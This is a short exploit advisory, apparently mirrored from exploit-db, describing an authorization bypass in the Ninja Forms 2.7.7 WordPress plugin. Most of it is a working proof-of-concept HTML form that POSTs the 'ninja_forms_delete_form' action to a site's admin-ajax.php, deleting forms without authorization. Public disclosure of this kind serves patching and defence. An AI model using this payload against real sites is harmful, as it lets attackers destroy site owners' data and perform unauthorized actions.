WordPress Plugin Ninja Forms 2.7.7 – Authentication Bypass

  • 作者: Voxel@Night
    日期: 2014-09-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39301/
  • source: https://www.securityfocus.com/bid/69740/info
    
    The Ninja Forms Plugin for WordPress is prone to an authorization-bypass vulnerability.
    
    An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
    
    Ninja Forms Plugin 2.7.7 is vulnerable; other versions may also be affected. 
    
    <html><body>
    <form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    form id: <input name="form_id" value="1"><br>
    action: <input name="action" value="ninja_forms_delete_form">
    <input type="submit" value="submit">
    </form>
    </body></html>